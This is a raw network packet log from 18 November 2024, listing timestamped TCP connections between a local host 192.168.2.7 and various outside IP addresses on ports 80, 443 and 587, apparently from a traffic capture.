                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:21.719952106 CET44349996104.26.13.205192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:21.720016003 CET44349996104.26.13.205192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:21.720098019 CET49996443192.168.2.7104.26.13.205
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:21.725266933 CET49996443192.168.2.7104.26.13.205
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:23.012875080 CET804999718.141.10.107192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:23.054914951 CET4999780192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:23.058830976 CET4999780192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:23.064157963 CET804999718.141.10.107192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:23.064224958 CET4999780192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:23.332758904 CET4999980192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:23.337749958 CET804999954.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:23.337861061 CET4999980192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:23.341366053 CET4999980192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:23.341388941 CET4999980192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:23.346293926 CET804999954.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:23.346307039 CET804999954.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:24.198163986 CET804999954.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:24.317903996 CET804999954.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:24.321516991 CET4999980192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:24.684986115 CET50000443192.168.2.7104.26.13.205
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:24.685034037 CET44350000104.26.13.205192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:24.685146093 CET50000443192.168.2.7104.26.13.205
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:24.688925982 CET50000443192.168.2.7104.26.13.205
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:24.688942909 CET44350000104.26.13.205192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:25.194267035 CET5000180192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:25.199117899 CET805000154.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:25.199229956 CET5000180192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:25.199368000 CET5000180192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:25.199383974 CET5000180192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:25.204168081 CET805000154.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:25.204189062 CET805000154.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:25.298285007 CET44350000104.26.13.205192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:25.298440933 CET50000443192.168.2.7104.26.13.205
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:25.299920082 CET50000443192.168.2.7104.26.13.205
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:25.299927950 CET44350000104.26.13.205192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:25.300601006 CET44350000104.26.13.205192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:25.321297884 CET50000443192.168.2.7104.26.13.205
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:25.367338896 CET44350000104.26.13.205192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:25.492219925 CET44350000104.26.13.205192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:25.492387056 CET44350000104.26.13.205192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:25.492443085 CET50000443192.168.2.7104.26.13.205
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:25.494797945 CET50000443192.168.2.7104.26.13.205
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:26.025418997 CET805000154.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:26.025666952 CET5000180192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:26.030806065 CET805000154.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:26.030853033 CET5000180192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:26.042807102 CET50002587192.168.2.751.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:26.045974016 CET5000380192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:26.047734976 CET5875000251.195.88.199192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:26.047823906 CET50002587192.168.2.751.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:26.050879955 CET805000318.141.10.107192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:26.050951004 CET5000380192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:26.051033974 CET5000380192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:26.051048040 CET5000380192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:29.857162952 CET5000680192.168.2.7172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:29.864767075 CET8050006172.234.222.138192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:29.864840031 CET5000680192.168.2.7172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:29.865233898 CET5000680192.168.2.7172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:29.865259886 CET5000680192.168.2.7172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:29.872606039 CET8050006172.234.222.138192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:29.872617006 CET8050006172.234.222.138192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:29.915278912 CET5875000251.195.88.199192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:29.922662020 CET50002587192.168.2.751.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:29.922981977 CET50007587192.168.2.751.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:29.928697109 CET5875000751.195.88.199192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:29.928809881 CET50007587192.168.2.751.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:30.136600018 CET804999882.112.184.197192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:30.136662960 CET4999880192.168.2.782.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:30.136882067 CET4999880192.168.2.782.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:30.143085957 CET804999882.112.184.197192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:30.287023067 CET5000880192.168.2.782.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:30.292865992 CET805000882.112.184.197192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:30.292943954 CET5000880192.168.2.782.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:30.293071032 CET5000880192.168.2.782.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:30.293097019 CET5000880192.168.2.782.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:30.297945023 CET805000882.112.184.197192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:30.297960997 CET805000882.112.184.197192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:30.538208008 CET8050006172.234.222.138192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:30.539757013 CET5000680192.168.2.7172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:30.539833069 CET5000680192.168.2.7172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:30.540992022 CET5000980192.168.2.7172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:30.545428991 CET8050006172.234.222.138192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:30.546681881 CET8050009172.234.222.138192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:30.546768904 CET5000980192.168.2.7172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:30.546947002 CET5000980192.168.2.7172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:30.546947002 CET5000980192.168.2.7172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:30.553742886 CET8050009172.234.222.138192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:30.553756952 CET8050009172.234.222.138192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:30.724092960 CET5875000751.195.88.199192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:30.724270105 CET50007587192.168.2.751.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:30.729424953 CET5875000751.195.88.199192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:30.963687897 CET5875000751.195.88.199192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:30.963881969 CET50007587192.168.2.751.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:30.968750954 CET5875000751.195.88.199192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:31.203581095 CET5875000751.195.88.199192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:31.203949928 CET50007587192.168.2.751.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:31.208940983 CET5875000751.195.88.199192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:31.209440947 CET8050009172.234.222.138192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:31.209537029 CET5000980192.168.2.7172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:31.213246107 CET5000980192.168.2.7172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:31.218161106 CET8050009172.234.222.138192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:31.448949099 CET5875000751.195.88.199192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:31.448967934 CET5875000751.195.88.199192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:31.448987007 CET5875000751.195.88.199192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:31.449058056 CET50007587192.168.2.751.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:31.456397057 CET50007587192.168.2.751.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:31.461355925 CET5875000751.195.88.199192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:31.576447964 CET5001080192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:31.581428051 CET805001018.141.10.107192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:31.581511021 CET5001080192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:35.191596031 CET5001380192.168.2.713.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:35.196947098 CET805001313.251.16.150192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:35.197005987 CET5001380192.168.2.713.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:35.400652885 CET5001480192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:35.405685902 CET805001444.221.84.105192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:35.405802011 CET5001480192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:35.406069040 CET5001480192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:35.406069040 CET5001480192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:35.410995007 CET805001444.221.84.105192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:35.411046982 CET805001444.221.84.105192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:36.077414036 CET805001444.221.84.105192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:36.077620983 CET5001480192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:36.083198071 CET805001444.221.84.105192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:36.083534002 CET5001480192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:36.235770941 CET5001580192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:36.240700006 CET805001518.141.10.107192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:36.240762949 CET5001580192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:36.241530895 CET5001580192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:36.241550922 CET5001580192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:36.246937990 CET805001518.141.10.107192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:36.246951103 CET805001518.141.10.107192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:37.713766098 CET805001518.141.10.107192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:37.714329004 CET5001580192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:37.719679117 CET805001518.141.10.107192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:37.722948074 CET5001580192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:37.928044081 CET5001680192.168.2.7172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:37.933011055 CET8050016172.234.222.138192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:37.933178902 CET5001680192.168.2.7172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:37.934586048 CET5001680192.168.2.7172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:37.934741020 CET5001680192.168.2.7172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:37.939634085 CET8050016172.234.222.138192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:37.940022945 CET8050016172.234.222.138192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:38.592382908 CET8050016172.234.222.138192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:38.592506886 CET5001680192.168.2.7172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:38.594280958 CET5001680192.168.2.7172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:38.600302935 CET8050016172.234.222.138192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:38.854281902 CET5001780192.168.2.7172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:38.859251022 CET8050017172.234.222.138192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:38.859535933 CET5001780192.168.2.7172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:38.859786987 CET5001780192.168.2.7172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:38.859786987 CET5001780192.168.2.7172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:38.864823103 CET8050017172.234.222.138192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:38.865304947 CET8050017172.234.222.138192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:39.539995909 CET8050017172.234.222.138192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:39.541830063 CET5001780192.168.2.7172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:39.558717966 CET5001780192.168.2.7172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:39.566906929 CET8050017172.234.222.138192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:39.726735115 CET5001880192.168.2.734.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:39.732115984 CET805001834.246.200.160192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:39.732182980 CET5001880192.168.2.734.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:39.741772890 CET5001880192.168.2.734.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:39.741792917 CET5001880192.168.2.734.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:39.746720076 CET805001834.246.200.160192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:39.746731043 CET805001834.246.200.160192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:40.697495937 CET805001834.246.200.160192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:40.697669983 CET5001880192.168.2.734.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:47.667795897 CET5002580192.168.2.735.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:47.672626019 CET805002535.164.78.200192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:47.672637939 CET805002535.164.78.200192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:48.490973949 CET805002535.164.78.200192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:48.491189003 CET5002580192.168.2.735.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:48.496578932 CET805002535.164.78.200192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:48.496654987 CET5002580192.168.2.735.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:48.642446041 CET5002680192.168.2.73.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:48.649209976 CET80500263.94.10.34192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:48.649350882 CET5002680192.168.2.73.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:48.655607939 CET5002680192.168.2.73.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:48.655630112 CET5002680192.168.2.73.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:48.662173986 CET80500263.94.10.34192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:48.662195921 CET80500263.94.10.34192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:49.302148104 CET80500263.94.10.34192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:49.307703972 CET5002680192.168.2.73.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:49.313278913 CET80500263.94.10.34192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:49.313340902 CET5002680192.168.2.73.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:49.592674971 CET5002780192.168.2.7165.160.13.20
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:49.597914934 CET8050027165.160.13.20192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:49.597980022 CET5002780192.168.2.7165.160.13.20
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:49.598207951 CET5002780192.168.2.7165.160.13.20
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:49.598232985 CET5002780192.168.2.7165.160.13.20
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:49.604466915 CET8050027165.160.13.20192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:49.604595900 CET8050027165.160.13.20192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:50.045886040 CET805002082.112.184.197192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:50.048242092 CET5002080192.168.2.782.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:50.050493956 CET5002080192.168.2.782.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:50.055349112 CET805002082.112.184.197192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:50.068418026 CET5002880192.168.2.782.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:50.073360920 CET805002882.112.184.197192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:50.073429108 CET5002880192.168.2.782.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:50.074286938 CET5002880192.168.2.782.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:50.074286938 CET5002880192.168.2.782.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:50.079166889 CET805002882.112.184.197192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:50.079179049 CET805002882.112.184.197192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:50.389439106 CET8050027165.160.13.20192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:50.442224979 CET5002780192.168.2.7165.160.13.20
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:50.485687971 CET5002780192.168.2.7165.160.13.20
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:50.485749960 CET5002780192.168.2.7165.160.13.20
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:50.490618944 CET8050027165.160.13.20192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:50.490637064 CET8050027165.160.13.20192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:50.706978083 CET8050027165.160.13.20192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:50.754692078 CET5002780192.168.2.7165.160.13.20
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:51.014457941 CET5002980192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:51.019541979 CET805002954.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:51.019623995 CET5002980192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:51.020060062 CET5002980192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:51.020090103 CET5002980192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:51.024930954 CET805002954.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:51.024946928 CET805002954.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:51.869700909 CET805002954.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:51.869899035 CET5002980192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:51.875159979 CET805002954.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:51.875232935 CET5002980192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:52.112091064 CET5002180192.168.2.7208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:59.723710060 CET5003680192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:59.728328943 CET805003644.221.84.105192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:59.728579044 CET805003644.221.84.105192.168.2.7
